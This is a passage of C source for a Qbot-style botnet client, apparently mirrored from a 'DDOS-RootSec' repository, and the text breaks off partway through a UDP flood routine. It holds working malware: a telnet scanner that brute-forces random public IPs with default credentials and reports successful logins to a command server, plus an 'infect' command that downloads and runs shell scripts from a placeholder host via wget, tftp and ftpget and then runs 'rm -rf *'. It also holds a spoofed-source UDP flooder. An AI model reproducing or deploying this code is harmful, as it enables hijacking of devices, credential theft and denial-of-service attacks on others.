Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Qbot/Cbot/client.c
5038 views
1
#include <stdlib.h>
2
#include <stdarg.h>
3
#include <stdio.h>
4
#include <sys/socket.h>
5
#include <sys/types.h>
6
#include <netinet/in.h>
7
#include <arpa/inet.h>
8
#include <netdb.h>
9
#include <signal.h>
10
#include <strings.h>
11
#include <string.h>
12
#include <sys/utsname.h>
13
#include <unistd.h>
14
#include <fcntl.h>
15
#include <errno.h>
16
#include <netinet/ip.h>
17
#include <netinet/udp.h>
18
#include <netinet/tcp.h>
19
#include <sys/wait.h>
20
#include <sys/ioctl.h>
21
#include <net/if.h>
22
23
#define PR_SET_NAME 15
24
#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
25
#define PAD_RIGHT 1
26
#define PAD_ZERO 2
27
#define PRINT_BUF_LEN 12
28
#define CMD_IAC 255
29
#define CMD_WILL 251
30
#define CMD_WONT 252
31
#define CMD_DO 253
32
#define CMD_DONT 254
33
#define OPT_SGA 3
34
#define SOCKBUF_SIZE 1024
35
struct telstate_t
36
{
37
int fd;
38
unsigned int ip;
39
unsigned char state;
40
unsigned char complete;
41
unsigned char usernameInd;
42
unsigned char passwordInd;
43
unsigned char tempDirInd;
44
unsigned int totalTimeout;
45
unsigned short bufUsed;
46
char *sockbuf;
47
};
48
unsigned char *commServer[] =
49
{
50
"0.0.0.0"
51
};
52
53
char *infect = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 0.0.0.0 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 0.0.0.0; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *;exit\r\n";
54
55
int initConnection();
56
void makeRandomStr(unsigned char *buf, int length);
57
int sockprintf(int sock, char *formatStr, ...);
58
char *inet_ntoa(struct in_addr in);
59
60
int mainCommSock = 0, currentServer = -1, gotIP = 0;
61
uint32_t *pids;
62
uint32_t scanPid;
63
uint64_t numpids = 0;
64
struct in_addr ourIP;
65
unsigned char macAddress[6] = {0};
66
char *usernames[] = {"root\0", "support\0", "guest\0", "ubnt\0"};
67
char *passwords[] = {"root\0", "\0", "admin\0", "123\0", "1234\0", "12345\0", "123456\0", "support\0", "ubnt\0", "7ujMko0vizxv\0", "dreambox\0", "guest\0"};
68
char* tmpdirs[] = {"/dev/netslink/", "/tmp/", "/var/", "/dev/", "/var/run/", "/dev/shm/", "/mnt/", "/boot/", "/usr/", (char*) 0};
69
char* advances[] = {":", "ogin", "sername", "assword", (char*)0};
70
char* fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
71
char* successes[] = {"busybox", "$", "#", (char*)0};
72
char* advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
73
#define PHI 0x9e3779b9
74
static uint32_t Q[4096], c = 362436;
75
76
void init_rand(uint32_t x)
77
{
78
int i;
79
80
Q[0] = x;
81
Q[1] = x + PHI;
82
Q[2] = x + PHI + PHI;
83
84
for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
85
}
86
87
uint32_t rand_cmwc(void)
88
{
89
uint64_t t, a = 18782LL;
90
static uint32_t i = 4095;
91
uint32_t x, r = 0xfffffffe;
92
i = (i + 1) & 4095;
93
t = a * Q[i] + c;
94
c = (uint32_t)(t >> 32);
95
x = t + c;
96
if (x < c) {
97
x++;
98
c++;
99
}
100
return (Q[i] = r - x);
101
}
102
103
int contains_string(char* buffer, char** strings)
104
{
105
int num_strings = 0, i = 0;
106
107
for(num_strings = 0; strings[++num_strings] != 0; );
108
109
for(i = 0; i < num_strings; i++)
110
{
111
if(strcasestr(buffer, strings[i]))
112
{
113
return 1;
114
}
115
}
116
117
return 0;
118
}
119
int contains_success(char* buffer)
120
{
121
return contains_string(buffer, successes);
122
}
123
124
int contains_fail(char* buffer)
125
{
126
return contains_string(buffer, fails);
127
}
128
129
int contains_response(char* buffer)
130
{
131
return contains_success(buffer) || contains_fail(buffer);
132
}
133
134
int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size)
135
{
136
fd_set read_set;
137
struct timeval tv;
138
tv.tv_sec = 0;
139
tv.tv_usec = timeout_usec;
140
141
FD_ZERO(&read_set);
142
FD_SET(fd, &read_set);
143
144
if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
145
return 0;
146
147
return recv(fd, buffer, buf_size, 0);
148
}
149
150
int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
151
{
152
int num_bytes, i;
153
memset(buffer, 0, buf_size);
154
num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
155
156
if(buffer[0] == 0xFF)
157
{
158
negotiate(fd, buffer, 3);
159
}
160
161
if(contains_string(buffer, strings))
162
{
163
return 1;
164
}
165
166
return 0;
167
}
168
169
const char* get_telstate_host(struct telstate_t* telstate)
170
{
171
struct in_addr in_addr_ip;
172
in_addr_ip.s_addr = telstate->ip;
173
return inet_ntoa(in_addr_ip);
174
}
175
void advance_state(struct telstate_t* telstate, int new_state)
176
{
177
if(new_state == 0)
178
{
179
close(telstate->fd);
180
}
181
182
telstate->totalTimeout = 0;
183
telstate->state = new_state;
184
memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
185
}
186
187
void reset_telstate(struct telstate_t* telstate)
188
{
189
advance_state(telstate, 0);
190
telstate->complete = 1;
191
}
192
void trim(char *str)
193
{
194
int i;
195
int begin = 0;
196
int end = strlen(str) - 1;
197
198
while (isspace(str[begin])) begin++;
199
200
while ((end >= begin) && isspace(str[end])) end--;
201
for (i = begin; i <= end; i++) str[i - begin] = str[i];
202
203
str[i - begin] = '\0';
204
}
205
206
static void printchar(unsigned char **str, int c)
207
{
208
if (str) {
209
**str = c;
210
++(*str);
211
}
212
else (void)write(1, &c, 1);
213
}
214
215
static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
216
{
217
register int pc = 0, padchar = ' ';
218
219
if (width > 0) {
220
register int len = 0;
221
register const unsigned char *ptr;
222
for (ptr = string; *ptr; ++ptr) ++len;
223
if (len >= width) width = 0;
224
else width -= len;
225
if (pad & PAD_ZERO) padchar = '0';
226
}
227
if (!(pad & PAD_RIGHT)) {
228
for ( ; width > 0; --width) {
229
printchar (out, padchar);
230
++pc;
231
}
232
}
233
for ( ; *string ; ++string) {
234
printchar (out, *string);
235
++pc;
236
}
237
for ( ; width > 0; --width) {
238
printchar (out, padchar);
239
++pc;
240
}
241
242
return pc;
243
}
244
245
static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
246
{
247
unsigned char print_buf[PRINT_BUF_LEN];
248
register unsigned char *s;
249
register int t, neg = 0, pc = 0;
250
register unsigned int u = i;
251
252
if (i == 0) {
253
print_buf[0] = '0';
254
print_buf[1] = '\0';
255
return prints (out, print_buf, width, pad);
256
}
257
258
if (sg && b == 10 && i < 0) {
259
neg = 1;
260
u = -i;
261
}
262
263
s = print_buf + PRINT_BUF_LEN-1;
264
*s = '\0';
265
266
while (u) {
267
t = u % b;
268
if( t >= 10 )
269
t += letbase - '0' - 10;
270
*--s = t + '0';
271
u /= b;
272
}
273
274
if (neg) {
275
if( width && (pad & PAD_ZERO) ) {
276
printchar (out, '-');
277
++pc;
278
--width;
279
}
280
else {
281
*--s = '-';
282
}
283
}
284
285
return pc + prints (out, s, width, pad);
286
}
287
288
static int print(unsigned char **out, const unsigned char *format, va_list args )
289
{
290
register int width, pad;
291
register int pc = 0;
292
unsigned char scr[2];
293
for (; *format != 0; ++format) {
294
if (*format == '%') {
295
++format;
296
width = pad = 0;
297
if (*format == '\0') break;
298
if (*format == '%') goto out;
299
if (*format == '-') {
300
++format;
301
pad = PAD_RIGHT;
302
}
303
while (*format == '0') {
304
++format;
305
pad |= PAD_ZERO;
306
}
307
for ( ; *format >= '0' && *format <= '9'; ++format) {
308
width *= 10;
309
width += *format - '0';
310
}
311
if( *format == 's' ) {
312
register char *s = (char *)va_arg( args, int );
313
pc += prints (out, s?s:"(null)", width, pad);
314
continue;
315
}
316
if( *format == 'd' ) {
317
pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
318
continue;
319
}
320
if( *format == 'x' ) {
321
pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
322
continue;
323
}
324
if( *format == 'X' ) {
325
pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
326
continue;
327
}
328
if( *format == 'u' ) {
329
pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
330
continue;
331
}
332
if( *format == 'c' ) {
333
scr[0] = (unsigned char)va_arg( args, int );
334
scr[1] = '\0';
335
pc += prints (out, scr, width, pad);
336
continue;
337
}
338
}
339
else {
340
out:
341
printchar (out, *format);
342
++pc;
343
}
344
}
345
if (out) **out = '\0';
346
va_end( args );
347
return pc;
348
}
349
350
int zprintf(const unsigned char *format, ...)
351
{
352
va_list args;
353
va_start( args, format );
354
return print( 0, format, args );
355
}
356
357
int szprintf(unsigned char *out, const unsigned char *format, ...)
358
{
359
va_list args;
360
va_start( args, format );
361
return print( &out, format, args );
362
}
363
364
int sockprintf(int sock, char *formatStr, ...)
365
{
366
unsigned char *textBuffer = malloc(2048);
367
memset(textBuffer, 0, 2048);
368
char *orig = textBuffer;
369
va_list args;
370
va_start(args, formatStr);
371
print(&textBuffer, formatStr, args);
372
va_end(args);
373
orig[strlen(orig)] = '\n';
374
zprintf("bot: %s\n", orig);
375
int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
376
free(orig);
377
return q;
378
}
379
380
unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
381
{
382
int got = 1, total = 0;
383
while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
384
return got == 0 ? NULL : buffer;
385
}
386
387
int wildString(const unsigned char* pattern, const unsigned char* string) {
388
switch(*pattern)
389
{
390
case '\0': return *string;
391
case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
392
case '?': return !(*string && !wildString(pattern+1, string+1));
393
default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
394
}
395
}
396
397
int getHost(unsigned char *toGet, struct in_addr *i)
398
{
399
struct hostent *h;
400
if((i->s_addr = inet_addr(toGet)) == -1) return 1;
401
return 0;
402
}
403
404
void makeRandomStr(unsigned char *buf, int length)
405
{
406
int i = 0;
407
for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
408
}
409
410
int recvLine(int socket, unsigned char *buf, int bufsize)
411
{
412
memset(buf, 0, bufsize);
413
414
fd_set myset;
415
struct timeval tv;
416
tv.tv_sec = 30;
417
tv.tv_usec = 0;
418
FD_ZERO(&myset);
419
FD_SET(socket, &myset);
420
int selectRtn, retryCount;
421
if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
422
while(retryCount < 10)
423
{
424
425
tv.tv_sec = 30;
426
tv.tv_usec = 0;
427
FD_ZERO(&myset);
428
FD_SET(socket, &myset);
429
if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
430
retryCount++;
431
continue;
432
}
433
434
break;
435
}
436
}
437
438
unsigned char tmpchr;
439
unsigned char *cp;
440
int count = 0;
441
442
cp = buf;
443
while(bufsize-- > 1)
444
{
445
if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
446
*cp = 0x00;
447
return -1;
448
}
449
*cp++ = tmpchr;
450
if(tmpchr == '\n') break;
451
count++;
452
}
453
*cp = 0x00;
454
455
return count;
456
}
457
458
int connectTimeout(int fd, char *host, int port, int timeout)
459
{
460
struct sockaddr_in dest_addr;
461
fd_set myset;
462
struct timeval tv;
463
socklen_t lon;
464
465
int valopt;
466
long arg = fcntl(fd, F_GETFL, NULL);
467
arg |= O_NONBLOCK;
468
fcntl(fd, F_SETFL, arg);
469
470
dest_addr.sin_family = AF_INET;
471
dest_addr.sin_port = htons(port);
472
if(getHost(host, &dest_addr.sin_addr)) return 0;
473
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
474
int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
475
476
if (res < 0) {
477
if (errno == EINPROGRESS) {
478
tv.tv_sec = timeout;
479
tv.tv_usec = 0;
480
FD_ZERO(&myset);
481
FD_SET(fd, &myset);
482
if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
483
lon = sizeof(int);
484
getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
485
if (valopt) return 0;
486
}
487
else return 0;
488
}
489
else return 0;
490
}
491
492
arg = fcntl(fd, F_GETFL, NULL);
493
arg &= (~O_NONBLOCK);
494
fcntl(fd, F_SETFL, arg);
495
496
return 1;
497
}
498
499
int listFork()
500
{
501
uint32_t parent, *newpids, i;
502
parent = fork();
503
if (parent <= 0) return parent;
504
numpids++;
505
newpids = (uint32_t*)malloc((numpids + 1) * 4);
506
for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
507
newpids[numpids - 1] = parent;
508
free(pids);
509
pids = newpids;
510
return parent;
511
}
512
513
int negotiate(int sock, unsigned char *buf, int len)
514
{
515
unsigned char c;
516
517
switch (buf[1]) {
518
case CMD_IAC: return 0;
519
case CMD_WILL:
520
case CMD_WONT:
521
case CMD_DO:
522
case CMD_DONT:
523
c = CMD_IAC;
524
send(sock, &c, 1, MSG_NOSIGNAL);
525
if (CMD_WONT == buf[1]) c = CMD_DONT;
526
else if (CMD_DONT == buf[1]) c = CMD_WONT;
527
else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
528
else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
529
send(sock, &c, 1, MSG_NOSIGNAL);
530
send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
531
break;
532
533
default:
534
break;
535
}
536
537
return 0;
538
}
539
540
int matchPrompt(char *bufStr)
541
{
542
char *prompts = ":>%$#\0";
543
544
int bufLen = strlen(bufStr);
545
int i, q = 0;
546
for(i = 0; i < strlen(prompts); i++)
547
{
548
while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
549
if(*(bufStr + bufLen - q) == prompts[i]) return 1;
550
}
551
552
return 0;
553
}
554
555
int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
556
{
557
int bufferUsed = initialIndex, got = 0, found = 0;
558
fd_set myset;
559
struct timeval tv;
560
tv.tv_sec = timeout;
561
tv.tv_usec = timeoutusec;
562
unsigned char *initialRead = NULL;
563
564
while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
565
{
566
FD_ZERO(&myset);
567
FD_SET(fd, &myset);
568
if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
569
initialRead = buffer + bufferUsed;
570
got = recv(fd, initialRead, 1, 0);
571
if(got == -1 || got == 0) return 0;
572
bufferUsed += got;
573
if(*initialRead == 0xFF)
574
{
575
got = recv(fd, initialRead + 1, 2, 0);
576
if(got == -1 || got == 0) return 0;
577
bufferUsed += got;
578
if(!negotiate(fd, initialRead, 3)) return 0;
579
} else {
580
if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
581
}
582
}
583
584
if(found) return 1;
585
return 0;
586
}
587
in_addr_t getRandomPublicIP()
588
{
589
uint8_t ipState[4] = {0};
590
ipState[0] = rand() % 255;
591
ipState[1] = rand() % 255;
592
ipState[2] = rand() % 255;
593
ipState[3] = rand() % 255;
594
595
while(
596
(ipState[0] == 0) ||
597
(ipState[0] == 10) ||
598
(ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
599
(ipState[0] == 127) ||
600
(ipState[0] == 169 && ipState[1] == 254) ||
601
(ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
602
(ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
603
(ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
604
(ipState[0] == 192 && ipState[1] == 168) ||
605
(ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
606
(ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
607
(ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
608
(ipState[0] >= 224)
609
)
610
{
611
ipState[0] = rand() % 255;
612
ipState[1] = rand() % 255;
613
ipState[2] = rand() % 255;
614
ipState[3] = rand() % 255;
615
}
616
617
char ip[16] = {0};
618
szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
619
return inet_addr(ip);
620
}
621
in_addr_t getRandomIP(in_addr_t netmask)
622
{
623
in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
624
return tmp ^ ( rand_cmwc() & ~netmask);
625
}
626
627
unsigned short csum (unsigned short *buf, int count)
628
{
629
register uint64_t sum = 0;
630
while( count > 1 ) { sum += *buf++; count -= 2; }
631
if(count > 0) { sum += *(unsigned char *)buf; }
632
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
633
return (uint16_t)(~sum);
634
}
635
636
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
637
{
638
639
struct tcp_pseudo
640
{
641
unsigned long src_addr;
642
unsigned long dst_addr;
643
unsigned char zero;
644
unsigned char proto;
645
unsigned short length;
646
} pseudohead;
647
unsigned short total_len = iph->tot_len;
648
pseudohead.src_addr=iph->saddr;
649
pseudohead.dst_addr=iph->daddr;
650
pseudohead.zero=0;
651
pseudohead.proto=IPPROTO_TCP;
652
pseudohead.length=htons(sizeof(struct tcphdr));
653
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
654
unsigned short *tcp = malloc(totaltcp_len);
655
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
656
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
657
unsigned short output = csum(tcp,totaltcp_len);
658
free(tcp);
659
return output;
660
}
661
662
void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
663
{
664
iph->ihl = 5;
665
iph->version = 4;
666
iph->tos = 0;
667
iph->tot_len = sizeof(struct iphdr) + packetSize;
668
iph->id = rand_cmwc();
669
iph->frag_off = 0;
670
iph->ttl = MAXTTL;
671
iph->protocol = protocol;
672
iph->check = 0;
673
iph->saddr = source;
674
iph->daddr = dest;
675
}
676
677
int sclose(int fd)
678
{
679
if(3 > fd) return 1;
680
close(fd);
681
return 0;
682
}
683
void StartTheLelz(int wait_usec, int maxfds)
684
{
685
int max = getdtablesize() - 100, i, res, num_tmps, j;
686
char buf[128], cur_dir;
687
688
if (max > maxfds)
689
max = maxfds;
690
fd_set fdset;
691
struct timeval tv;
692
socklen_t lon;
693
int valopt;
694
695
char line[256];
696
char* buffer;
697
struct sockaddr_in dest_addr;
698
dest_addr.sin_family = AF_INET;
699
dest_addr.sin_port = htons(23);
700
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
701
702
buffer = malloc(SOCKBUF_SIZE + 1);
703
memset(buffer, 0, SOCKBUF_SIZE + 1);
704
705
struct telstate_t fds[max];
706
707
708
memset(fds, 0, max * (sizeof(int) + 1));
709
for(i = 0; i < max; i++)
710
{
711
memset(&(fds[i]), 0, sizeof(struct telstate_t));
712
fds[i].complete = 1;
713
fds[i].sockbuf = buffer;
714
}
715
for(num_tmps = 0; tmpdirs[++num_tmps] != 0; );
716
717
718
719
while(1)
720
{
721
for(i = 0; i < max; i++)
722
{
723
if(fds[i].totalTimeout == 0)
724
{
725
fds[i].totalTimeout = time(NULL);
726
}
727
728
switch(fds[i].state)
729
{
730
case 0:
731
{
732
if(fds[i].complete == 1)
733
{
734
// clear the current fd
735
char *tmp = fds[i].sockbuf;
736
memset(&(fds[i]), 0, sizeof(struct telstate_t));
737
fds[i].sockbuf = tmp;
738
// get a new random ip
739
fds[i].ip = getRandomPublicIP();
740
}
741
else if(fds[i].complete == 0)
742
{
743
fds[i].passwordInd++;
744
745
if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *))
746
{
747
fds[i].passwordInd = 0;
748
fds[i].usernameInd++;
749
}
750
if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *))
751
{
752
fds[i].complete = 1;
753
continue;
754
}
755
}
756
757
dest_addr.sin_family = AF_INET;
758
dest_addr.sin_port = htons(23);
759
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
760
dest_addr.sin_addr.s_addr = fds[i].ip;
761
762
fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
763
764
if(fds[i].fd == -1) continue;
765
766
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
767
768
if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
769
{
770
reset_telstate(&fds[i]);
771
}
772
else
773
{
774
advance_state(&fds[i], 1);
775
}
776
}
777
break;
778
779
case 1:
780
{
781
FD_ZERO(&fdset);
782
FD_SET(fds[i].fd, &fdset);
783
tv.tv_sec = 0;
784
tv.tv_usec = wait_usec;
785
res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
786
787
if(res == 1)
788
{
789
lon = sizeof(int);
790
valopt = 0;
791
getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
792
//printf("%d\n",valopt);
793
if(valopt)
794
{
795
reset_telstate(&fds[i]);
796
}
797
else
798
{
799
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
800
advance_state(&fds[i], 2);
801
}
802
continue;
803
}
804
else if(res == -1)
805
{
806
reset_telstate(&fds[i]);
807
continue;
808
}
809
810
if(fds[i].totalTimeout + 6 < time(NULL))
811
{
812
reset_telstate(&fds[i]);
813
}
814
}
815
break;
816
817
case 2:
818
{
819
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
820
{
821
if(contains_fail(fds[i].sockbuf))
822
{
823
advance_state(&fds[i], 0);
824
}
825
else
826
{
827
advance_state(&fds[i], 3);
828
}
829
830
continue;
831
}
832
833
if(fds[i].totalTimeout + 6 < time(NULL))
834
{
835
reset_telstate(&fds[i]);
836
}
837
}
838
break;
839
840
case 3:
841
{
842
if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
843
{
844
reset_telstate(&fds[i]);
845
continue;
846
}
847
848
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
849
{
850
reset_telstate(&fds[i]);
851
continue;
852
}
853
854
advance_state(&fds[i], 4);
855
}
856
break;
857
858
case 4:
859
{
860
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
861
{
862
if(contains_fail(fds[i].sockbuf))
863
{
864
advance_state(&fds[i], 0);
865
}
866
else
867
{
868
advance_state(&fds[i], 5);
869
}
870
continue;
871
}
872
873
if(fds[i].totalTimeout + 6 < time(NULL))
874
{
875
reset_telstate(&fds[i]);
876
}
877
}
878
break;
879
880
case 5:
881
{
882
if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
883
{
884
reset_telstate(&fds[i]);
885
continue;
886
}
887
888
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
889
{
890
reset_telstate(&fds[i]);
891
continue;
892
}
893
894
advance_state(&fds[i], 6);
895
}
896
break;
897
898
case 6:
899
{
900
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
901
{
902
fds[i].totalTimeout = 0;
903
904
if(contains_fail(fds[i].sockbuf))
905
{
906
advance_state(&fds[i], 0);
907
}
908
else if(contains_success(fds[i].sockbuf))
909
{
910
if(fds[i].complete == 2)
911
{
912
advance_state(&fds[i], 7);
913
}
914
else
915
{
916
sockprintf(mainCommSock, "Success telnet attempt - %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
917
advance_state(&fds[i], 7);
918
}
919
}
920
else
921
{
922
reset_telstate(&fds[i]);
923
}
924
continue;
925
}
926
927
if(fds[i].totalTimeout + 7 < time(NULL))
928
{
929
reset_telstate(&fds[i]);
930
}
931
}
932
break;
933
case 7:
934
{
935
for(j = 0; j < num_tmps; j++)
936
{
937
memset(buf, 0, 128);
938
if(j == 0)
939
snprintf(buf, 127, ">%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve\r\n", tmpdirs[j], tmpdirs[j], tmpdirs[j], tmpdirs[j]);
940
else
941
snprintf(buf, 127, ">%s.t && cd %s ; >retrieve\r\n", tmpdirs[j], tmpdirs[j], tmpdirs[j]);
942
943
if(send(fds[i].fd, buf, strlen(buf), MSG_NOSIGNAL) < 0)
944
{
945
reset_telstate(&fds[i]);
946
continue;
947
}
948
}
949
advance_state(&fds[i], 8);
950
}
951
break;
952
case 8:
953
{
954
fds[i].totalTimeout = 0;
955
if(send(fds[i].fd, infect, strlen(infect), MSG_NOSIGNAL) < 0)
956
{
957
sockprintf(mainCommSock, "Bot deploy success - %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
958
reset_telstate(&fds[i]);
959
continue;
960
}
961
if(fds[i].totalTimeout + 10 < time(NULL))
962
{
963
sockprintf(mainCommSock, "Bot deploy failed - %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
964
reset_telstate(&fds[i]);
965
}
966
break;
967
}
968
}
969
}
970
}
971
}
972
973
974
975
void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval)
976
{
977
struct sockaddr_in dest_addr;
978
979
dest_addr.sin_family = AF_INET;
980
if(port == 0) dest_addr.sin_port = rand_cmwc();
981
else dest_addr.sin_port = htons(port);
982
if(getHost(target, &dest_addr.sin_addr)) return;
983
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
984
985
register unsigned int pollRegister;
986
pollRegister = pollinterval;
987
988
if(spoofit == 32)
989
{
990
int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
991
if(!sockfd)
992
{
993
// sockprintf(mainCommSock, "Failed opening raw socket.");
994
return;
995
}
996
997
unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
998
if(buf == NULL) return;
999
memset(buf, 0, packetsize + 1);
1000
makeRandomStr(buf, packetsize);
1001
1002
int end = time(NULL) + timeEnd;
1003
register unsigned int i = 0;
1004
while(1)
1005
{
1006
sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1007
1008
if(i == pollRegister)
1009
{
1010
if(port == 0) dest_addr.sin_port = rand_cmwc();
1011
if(time(NULL) > end) break;
1012
i = 0;
1013
continue;
1014
}
1015
i++;
1016
}
1017
} else {
1018
int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
1019
if(!sockfd)
1020
{
1021
//sockprintf(mainCommSock, "Failed opening raw socket.");
1022
//sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
1023
return;
1024
}
1025
1026
int tmp = 1;
1027
if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1028
{
1029
// sockprintf(mainCommSock, "Failed setting raw headers mode.");
1030
return;
1031
}
1032
1033
int counter = 50;
1034
while(counter--)
1035
{
1036
srand(time(NULL) ^ rand_cmwc());
1037
init_rand(rand());
1038
}
1039
1040
in_addr_t netmask;
1041
1042
if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1043
else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1044
1045
unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
1046
struct iphdr *iph = (struct iphdr *)packet;
1047
struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
1048
1049
makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
1050
1051
udph->len = htons(sizeof(struct udphdr) + packetsize);
1052
udph->source = rand_cmwc();
1053
udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1054
udph->check = 0;
1055
1056
makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
1057
1058
iph->check = csum ((unsigned short *) packet, iph->tot_len);
1059
1060
int end = time(NULL) + timeEnd;
1061
register unsigned int i = 0;
1062
while(1)
1063
{
1064
sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1065
1066
